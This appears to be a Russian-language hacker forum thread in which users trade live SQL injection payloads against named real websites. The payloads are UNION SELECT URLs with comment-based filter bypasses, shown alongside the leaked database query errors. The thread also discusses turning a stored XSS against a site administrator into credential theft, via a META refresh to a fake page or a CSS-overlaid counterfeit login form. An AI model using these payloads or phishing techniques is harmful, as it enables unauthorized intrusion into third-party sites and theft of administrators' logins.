Там 4 ветка )
http://www.bethinking.org/resource.php?ID=233'+union+select+1,UNHEX(HEX(vers ion())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19--+

2 AkyHa_MaTaTa:

не что-то, а именно в данном конкретном случае катит /**/

редирект
главная страница + ошибки
вывод сделать не получается, все время редирект

Есть такой вопрос,вопшем я нашел активную хсс,вот только дело в том что я тому админу которому на ету страницу зову,то он с телефона! а яваскрипт то там неработает,что можно придумать?????плиз,скорее....((

Можно редиректнуть его на фейк через META refresh или

можно попробовать стилями (CSS) спрятать поле куда логин пароль вводится и отпозиционировать туда свою форму с вводом логина-пароля и другим action (ну и всё указывающее на то что он уже залогинен тоже спрятать).

Хотя это муторно и не факт, что реализуемо на практике, но просто идея (Зато без скриптов )

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Ты хоть сам понял что написал? вопше хсс в основе не определенной странице,и точно что не на вводе логина и пасса,и думаешь ето АДМИНУ ЕТОГО САЙТА будет так беспотпально то что я сделаю?...

не согласен, давай проведем маленький экспиремент, и так смотри, я буду основываться на показываемой ошибке как конечном результате, и так смотрем гверю:

http://www.dance4you.ru/teachers/info/data/ic_6/-381'

и так судя по всему 7 колонок выбераеться,
и так вызываем ошибку и пробуем посмотреть
http://www.dance4you.ru/teachers/info/data/ic_6/-381'/**/union/**/select/**/1,2,3,4,5,6,7,2,3,4,5,6--
и имеем в ответ

SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381'

то есть кавычка прошла а все остольное нет и что бы в это убедиться смотрем так
http://www.dance4you.ru/teachers/info/data/ic_6/-381'+union+select/**/1,2,3,4,5,6,7,2,3,4,5,6--

SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381'+union+select

то все что до /**/ проходит в переменую и вставляеться в гверю а все остольное нет, по все видимости в .htacess ишет значения переменой именно между / / и вставляет ее в запрос, сорее всего,как написал l1ght, только прямое обрашения к скрипту даст какой то результат.

Я даже твой пост с трудом понимаю из-за количества ашипок.

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Ну,я так пишу,такой лексикон у мну,ничё тут не сделаешь...) вопщем та идея с css никак не прокатит вопше......надо чтото другое думать(( Вопшем тут такой баг,тут с редактироваем инфы,поле Имя заносится в mysql,и в нем можно любой код писать,там без фильтров всё,xss отлично работает,ну вот что можно бы придумать окроме xss? потому что ето вап сайт,и тут хсс почти бесполезно,потому что там почти все с телфонов,где яваскрипт не идет...(